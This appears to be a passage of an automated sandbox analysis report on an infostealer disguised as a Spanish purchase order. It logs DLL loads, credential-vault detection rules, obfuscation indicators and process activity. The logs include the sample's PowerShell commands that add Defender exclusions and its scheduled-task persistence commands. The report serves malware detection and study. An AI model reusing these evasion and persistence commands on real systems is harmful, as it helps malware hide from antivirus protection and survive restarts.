                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: wbemcomn.dll
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: rasapi32.dll
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: rasman.dll
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: rtutils.dll
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: secur32.dll
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: schannel.dll
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: mskeyprotect.dll
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: ntasn1.dll
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: ncrypt.dll
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: ncryptsslp.dll
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: vaultcli.dll
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: dpapi.dll
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: edputil.dll
                      Source: nOrden_de_compra.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 0.2.nOrden_de_compra.exe.3fb4308.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 11.2.nNdsLvHyWi.exe.3a78c38.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.nOrden_de_compra.exe.3f77ae8.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 11.2.nNdsLvHyWi.exe.3ab5458.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 11.2.nNdsLvHyWi.exe.3ab5458.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 11.2.nNdsLvHyWi.exe.3a78c38.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.nOrden_de_compra.exe.3fb4308.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.nOrden_de_compra.exe.3f77ae8.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: nOrden_de_compra.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: nNdsLvHyWi.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 0.2.nOrden_de_compra.exe.3ca9970.4.raw.unpack, lY.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.nOrden_de_compra.exe.3fb4308.2.raw.unpack, UyDMxsd3t.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.nOrden_de_compra.exe.3fb4308.2.raw.unpack, 86A7K.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.nOrden_de_compra.exe.3fb4308.2.raw.unpack, vztq.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.nOrden_de_compra.exe.3fb4308.2.raw.unpack, B80ITW1.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.nOrden_de_compra.exe.3fb4308.2.raw.unpack, uQSn7t.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                      Source: 0.2.nOrden_de_compra.exe.3fb4308.2.raw.unpack, bEoUgRL.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.nOrden_de_compra.exe.3fb4308.2.raw.unpack, Dg1qrk6E.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.nOrden_de_compra.exe.3fb4308.2.raw.unpack, Dg1qrk6E.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.nOrden_de_compra.exe.4097d28.3.raw.unpack, kp8qwk5XbcOdplPSn8.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.nOrden_de_compra.exe.7e10000.8.raw.unpack, kp8qwk5XbcOdplPSn8.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.nOrden_de_compra.exe.7e10000.8.raw.unpack, VahwTb7cT8mornX0bA.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.nOrden_de_compra.exe.7e10000.8.raw.unpack, VahwTb7cT8mornX0bA.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.nOrden_de_compra.exe.7e10000.8.raw.unpack, VahwTb7cT8mornX0bA.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.nOrden_de_compra.exe.4097d28.3.raw.unpack, VahwTb7cT8mornX0bA.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.nOrden_de_compra.exe.4097d28.3.raw.unpack, VahwTb7cT8mornX0bA.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.nOrden_de_compra.exe.4097d28.3.raw.unpack, VahwTb7cT8mornX0bA.csSecurity API names: _0020.AddAccessRule
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@21/15@2/2
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeFile created: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5432:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3804:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4344:120:WilError_03
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeMutant created: \Sessions\1\BaseNamedObjects\BVLcFHVzoBgkOFRmqAinQVZmS
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6312:120:WilError_03
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeFile created: C:\Users\user\AppData\Local\Temp\tmpD5F2.tmpJump to behavior
                      Source: nOrden_de_compra.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: nOrden_de_compra.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: nOrden_de_compra.exeReversingLabs: Detection: 63%
                      Source: nOrden_de_compra.exeVirustotal: Detection: 43%
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeFile read: C:\Users\user\Desktop\nOrden_de_compra.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\nOrden_de_compra.exe C:\Users\user\Desktop\nOrden_de_compra.exe
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nOrden_de_compra.exe
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nNdsLvHyWi" /XML "C:\Users\user\AppData\Local\Temp\tmpD5F2.tmp
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess created: C:\Users\user\Desktop\nOrden_de_compra.exe C:\Users\user\Desktop\nOrden_de_compra.exe
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess created: C:\Users\user\Desktop\nOrden_de_compra.exe C:\Users\user\Desktop\nOrden_de_compra.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nNdsLvHyWi" /XML "C:\Users\user\AppData\Local\Temp\tmpE302.tmp
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess created: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nOrden_de_compra.exeJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nNdsLvHyWi" /XML "C:\Users\user\AppData\Local\Temp\tmpD5F2.tmpJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess created: C:\Users\user\Desktop\nOrden_de_compra.exe C:\Users\user\Desktop\nOrden_de_compra.exeJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess created: C:\Users\user\Desktop\nOrden_de_compra.exe C:\Users\user\Desktop\nOrden_de_compra.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nNdsLvHyWi" /XML "C:\Users\user\AppData\Local\Temp\tmpE302.tmpJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess created: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: nOrden_de_compra.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: nOrden_de_compra.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: nOrden_de_compra.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: rYwr.pdbSHA256$x] source: nOrden_de_compra.exe, nNdsLvHyWi.exe.0.dr
                      Source: Binary string: rYwr.pdb source: nOrden_de_compra.exe, nNdsLvHyWi.exe.0.dr

                      Data Obfuscation

                      barindex
                      Source: 0.2.nOrden_de_compra.exe.3ca9970.4.raw.unpack, lY.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 0.2.nOrden_de_compra.exe.2cde9dc.0.raw.unpack, SU.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 0.2.nOrden_de_compra.exe.7160000.5.raw.unpack, lY.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: nOrden_de_compra.exe, Form11.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                      Source: nNdsLvHyWi.exe.0.dr, Form11.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                      Source: 0.2.nOrden_de_compra.exe.7e10000.8.raw.unpack, VahwTb7cT8mornX0bA.cs.Net Code: O20eo3LBDN System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.nOrden_de_compra.exe.4097d28.3.raw.unpack, VahwTb7cT8mornX0bA.cs.Net Code: O20eo3LBDN System.Reflection.Assembly.Load(byte[])
                      Source: nOrden_de_compra.exeStatic PE information: 0xB560437B [Sat Jun 5 17:33:47 2066 UTC]
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeCode function: 0_2_071E83B0 pushfd ; retf 0_2_071E83BD
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeCode function: 0_2_071E81C1 push esp; retf 0_2_071E81CD
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeCode function: 0_2_071E81F8 pushad ; retf 0_2_071E8205
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeCode function: 0_2_0722546A pushfd ; ret 0_2_07225471
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeCode function: 10_2_02CD0CB5 push edi; ret 10_2_02CD0CC2
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 11_2_06CD76C3 push cs; retf 11_2_06CD76CA
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 11_2_06CD7643 push esp; retf 11_2_06CD7645
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 11_2_06CD767B pushad ; retf 11_2_06CD767D
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 11_2_06CD7671 push cs; retf 11_2_06CD7672
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 11_2_06CD7673 push cs; retf 11_2_06CD767A
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 11_2_06CDB777 push edi; retf 11_2_06CDB77A
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 11_2_06CDB773 push edi; retf 11_2_06CDB776
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 11_2_06CD7708 push cs; retf 11_2_06CD770A
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 11_2_06CDB727 push edi; retf 11_2_06CDB72A
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 11_2_06CDB720 push edi; retf 11_2_06CDB722
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 11_2_06CDB45B push ebp; retf 11_2_06CDB462
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 11_2_06CDB2D0 push ebx; retf 11_2_06CDB2D2
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 11_2_06CDB243 push edx; retf 11_2_06CDB246
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 11_2_06CDB360 push ebx; retf 11_2_06CDB362
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 11_2_06CDB363 push ebx; retf 11_2_06CDB366
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 11_2_06CDB088 push edx; retf 11_2_06CDB11A
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 11_2_06CDB079 push ecx; retf 11_2_06CDB07A
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 11_2_06CDB1F3 push edx; retf 11_2_06CDB1F6
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 11_2_06CDB1B9 push edx; retf 11_2_06CDB1BA
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 11_2_06CD6E6B push es; retf 11_2_06CD6E6E
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 11_2_06CD6DE1 push es; retf 11_2_06CD6DE2
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 11_2_06CD6DE3 push es; retf 11_2_06CD6DE6
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 11_2_06CD6D01 push es; retf 11_2_06CD6D02
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 11_2_06CD6D3F push es; retf 11_2_06CD6D42
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 11_2_06CD6D38 push es; retf 11_2_06CD6D3A
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 11_2_06CDB893 push edi; retf 11_2_06CDB89A
                      Source: nOrden_de_compra.exeStatic PE information: section name: .text entropy: 7.935524491398435
                      Source: nNdsLvHyWi.exe.0.drStatic PE information: section name: .text entropy: 7.935524491398435
                      Source: 0.2.nOrden_de_compra.exe.7e10000.8.raw.unpack, qlDLMdzah6XGe81ZR4.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'pXwn8AxVdQ', 'cESnjDjyIt', 'UXunxURNEB', 'cqAnYwSAn5', 'cFXn1xIknu', 'SCnnnb8dse', 'knonJ3Uobt'
                      Source: 0.2.nOrden_de_compra.exe.7e10000.8.raw.unpack, OyOqeoeatmsG22RUyf.csHigh entropy of concatenated method names: 'JK74Zp8qwk', 'xbc47OdplP', 'ifk4FXltIZ', 'ErP4UnXgm5', 'jLg4j9L5Fc', 'WOW4xUDLkZ', 'u60HwKfUDb37IZVlHn', 'DrYVWGVS84EdjnPx01', 'nQN44tyf4V', 'Qjw4VVuUlL'
                      Source: 0.2.nOrden_de_compra.exe.7e10000.8.raw.unpack, M5tu5eScEBZf24uGb6.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Nynp0FqCwa', 'HHjpuVkpPt', 'gQppzx1Q4N', 'LCBVaOcCQP', 'DwJV4PxuYd', 'cZrVpMljnu', 'Xc7VVjpe1A', 'URQe9pssTfI53BD6l98'
                      Source: 0.2.nOrden_de_compra.exe.7e10000.8.raw.unpack, DFcyOWbUDLkZIX04JR.csHigh entropy of concatenated method names: 'BXnMNtI8DI', 'gbFMcPorB4', 'POoMCB0x07', 'oDNMZYEao4', 'tGBM7ZW2aZ', 'QPCCkSOuiw', 'zhZCBUn3tM', 'vjuCvT8ZL1', 'mOYCyTjkjS', 'opvC0gPN0C'
                      Source: 0.2.nOrden_de_compra.exe.7e10000.8.raw.unpack, dSPneu4Vjx6HTGfCEdG.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'WagJ9Nlr8b', 'u3QJP5YZQR', 'nFdJWjt40G', 'fQyJ2BNJGd', 'bQ7JkLwtH5', 'ULlJBjRCBx', 'D1wJvX5WjN'
                      Source: 0.2.nOrden_de_compra.exe.7e10000.8.raw.unpack, JSMvQGDlHAfTwMe3ZO.csHigh entropy of concatenated method names: 'RKF85RQHxR', 'xJs8qOVEqg', 'X048bi6C1U', 'QOR8tpwed8', 'rPV8mY4mGw', 'me48r4Fys1', 'WKS8f225l4', 'qdL8H5yIdc', 'HGo8AlYwI8', 'K3O8EUDBJE'
                      Source: 0.2.nOrden_de_compra.exe.7e10000.8.raw.unpack, cDToTJpHXBOUtdduer.csHigh entropy of concatenated method names: 'NOBoLeGHI', 'Q2Msr290T', 'HsEKEAcmK', 'pZKRCHrOw', 'jMFqmu74v', 'Xjji3YQsl', 'WM9m99eBqSRaCcgGHi', 'WbDeRUMry9pAMhQX3M', 'dya1Z95KQ', 'ld4J119X2'
                      Source: 0.2.nOrden_de_compra.exe.7e10000.8.raw.unpack, UYJYJc2aCln22jB6Dg.csHigh entropy of concatenated method names: 'oseYFbC1I2', 'mN3YU31JMy', 'ToString', 'NifYIGikQ0', 'W6xYcbNm3d', 'fHBYSpQpQs', 'MQOYCk0jM2', 'nkoYMoiOcK', 'xiaYZhCxcJ', 'cLgY7sE68f'
